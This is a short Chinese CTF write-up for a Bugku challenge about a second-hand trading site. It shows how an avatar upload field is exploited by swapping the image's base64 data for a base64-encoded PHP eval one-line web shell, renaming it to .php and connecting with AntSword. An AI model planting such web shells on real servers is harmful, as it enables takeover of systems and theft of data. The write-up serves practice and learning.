Bugku CTF之xxx二手交易市场

  • 0x001 wp
  • 0x002 结束语

0x001 wp

打开题目,点击进入链接,是一个二手交易市场平台

开始想的可不可能是修改购买价格,然后发现根本没有购买功能,只能先登录看看

根据我学过的一丢丢漏洞知识,感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;
前两个观摩尝试了半天,没找到头绪。
看看头像上传,上传文件,抓包

看到后面好长一串,image参数后面是文件后缀JPEG,然后有base 64,再后面应该是图片的base64编码,看看传个一句马试试

先把<?php @eval($_POST['huacheng']);?>base64加密一下,提换掉后面的一长串,然后改一下后缀为php


响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag

0x002 结束语

我不后悔

Bugku CTF之xxx二手交易市场相关推荐

  1. BugKu CTF Web

    BugKu CTF Web 滑稽 计算器 GET POST Simple_SSTI_1 矛盾 eval 变量1 Simple_SSTI_2 alert 你必须让他停下 方法一 方法二 方法三 网站被黑 ...

  2. [Bugku CTF——Pwn] pwn2

    [Bugku CTF--Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 explo ...

  3. [Bugku CTF——Pwn] pwn4

    [Bugku CTF--Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadge ...

  4. [Bugku CTF——Pwn] pwn1

    [Bugku CTF--Pwn] pwn1 题目地址:https://ctf.bugku.com/ 额, 直接nc连接上,就可以直接得到shell 好水哦,新手玩玩就好,老鸟勿喷 无语凝噎 cat f ...

  5. BugKu CTF(杂项篇MISC)—放松一下吧

    CTF BugKu CTF (杂项篇MISC) 攻与防 放松一下吧 描 述: bugku{} 下载后是一个压缩包. 一.工具 十六进制编辑工具 010 editor 图片加解密工具F5-stegano ...

  6. BugKu CTF(杂项篇MISC)—想要种子吗

    CTF BugKu CTF (杂项篇MISC) 攻与防 想要种子吗 提 示: 描 述:flag{} 题目下载后是一张图片,打开如下. 一.工具 十六进制编辑器010 editor kali系统文件分离 ...

  7. 校园转转二手市场源码/Java二手交易市场整站源码

    ☑️ 编号:ym367 ☑️ 品牌:无 ☑️ 语言:Java ☑️ 大小:33MB ☑️ 类型:二手交易市场 ☑️ 支持:pc+wap

  8. Android Studio校园二手交易市场app

    [安卓大作业]Android Studio校园二手交易市场app 界面展示 主要功能 1.登陆注册用户,若忘记密码可通过邮箱找回密码: 2.商品分类展示,可在首页购买商品: 3.商品详情页可留言.收藏 ...

  9. BugKu CTF(杂项篇MISC)---细心的大象

    BugKu CTF(杂项篇MISC)-细心的大象 下载得到图片 foremost 分离得到压缩包 foremost 1.jpg 查看图片详细信息 TVNEUzQ1NkFTRDEyM3p6 base64 ...

  10. springboot校园二手交易市场网站毕业设计-附源码071008

    目  录 摘要 1 绪论 1.1 研究背景 1.2国内外研究现状 1.3论文结构与章节安排 2校园二手交易市场网站系统分析 2.1 可行性分析 2.2 系统流程分析 2.2.1 数据流程 3.3.2 ...

最新文章

  1. 老年机按键串号_2019年最适合买的老人机——AGM M5,4G全网通+支持微信
  2. piwik mysql_piwik流量统计系统搭建(apache2.4+piwik+mysql5.6+php5.6.14)
  3. docker常用命令(总结)
  4. 编写函数,可以接收任意多个整数并输出其中的最大值和所有整数之和。
  5. php并发访问排队_PHP高并发处理方案
  6. 探索 OpenStack 之(10):深入镜像服务Glance
  7. GitHub.com上的那些东西你都知道什么意思吗?
  8. P1866 编号 python
  9. World Wind Java开发之十——AnalyticSurface栅格渲染(转)
  10. SQL Server安装问题程序被挂起的错误解决办法
  11. [delphi函数]RenameFile 文件改名
  12. 5-2 持久化的作用/5-3 RDB1/5-4 RDB2/5-5 RDB3
  13. C#版Windows服务安装卸载小工具-附源码
  14. 20190613 一个SQL问题
  15. Office Tool Plus v8.2.4.0 安装Office组件小工具
  16. android登录ins,在android中集成instagram身份验证
  17. 关于 jspx 文件的一些说明
  18. 【亲自实践能够下载的谷歌地图切片url地址】谷歌地图数据下载的尝试以及Python爬虫实现
  19. 电脑与电脑之间快速传输大文件的方法
  20. 计算机量子化学计算焓,本科毕业论文--量子化学计算的基本原理及应用.doc

热门文章

  1. ‘vue-cli-service‘ 不是内部或外部命令,也不是可运行的程序或批处理文件。(解决办法)
  2. Python气象绘图教程(二十一)—Cartopy_10
  3. 基于单片机的室内装修环境检测-甲醛 PM2.5
  4. No6: 各API功能的使用积累汇总
  5. 键盘事件 和键码一览整理
  6. 销售最大的敌人是谁?
  7. 由云台协议DLL浅谈插件程序的编写 .
  8. windows不能执行打印任务
  9. 合规数知法用法平台深化政府权责清单制度建设,护航中国法治政府建设
  10. 彻底卸载GitLab并重装